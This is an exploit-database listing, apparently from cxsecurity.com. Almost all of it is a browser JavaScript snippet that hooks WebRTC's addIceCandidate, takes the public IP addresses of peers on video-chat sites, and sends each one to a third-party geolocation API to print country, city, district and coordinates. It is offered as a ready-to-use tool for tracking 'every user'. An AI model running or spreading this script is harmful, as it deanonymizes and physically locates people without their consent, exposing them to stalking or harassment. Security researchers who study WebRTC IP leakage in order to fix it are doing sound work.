P2P Communication Vulnerability (IP-Tracking)

2021.04.01
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: P2P Communication Vulnerability (IP-Tracking) # Date: 01/04/2021 # Exploit Author: Tobias Marcotto # Tested on: Kali Linux x64 # Description: Due to the peer-to-peer (P2P) communication vulnerability on videochat websites, it is possible to find out every IP address of every user!!! ********************************************************************************************************* // BY TOBIAS MARCOTTO let apiKey = "API-KEY"; window.oRTCPeerConnection = window.oRTCPeerConnection || window.RTCPeerConnection; window.RTCPeerConnection = function (...args) { const pc = new window.oRTCPeerConnection(...args); pc.oaddIceCandidate = pc.addIceCandidate; pc.addIceCandidate = function (iceCandidate, ...rest) { const fields = iceCandidate.candidate.split(" "); console.log(iceCandidate.candidate); const ip = fields[4]; if (fields[7] === "srflx") { getLocation(ip); } return pc.oaddIceCandidate(iceCandidate, ...rest); }; return pc; }; let getLocation = async (ip) => { let url = `https://api.ipgeolocation.io/ipgeo?apiKey=${apiKey}&ip=${ip}`; await fetch(url).then((response) => response.json().then((json) => { const output = ` --------------------- Country: ${json.country_name} State: ${json.state_prov} City: ${json.city} District: ${json.district} Lat / Long: (${json.latitude}, ${json.longitude}) --------------------- `; console.log(output); }) ); };


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top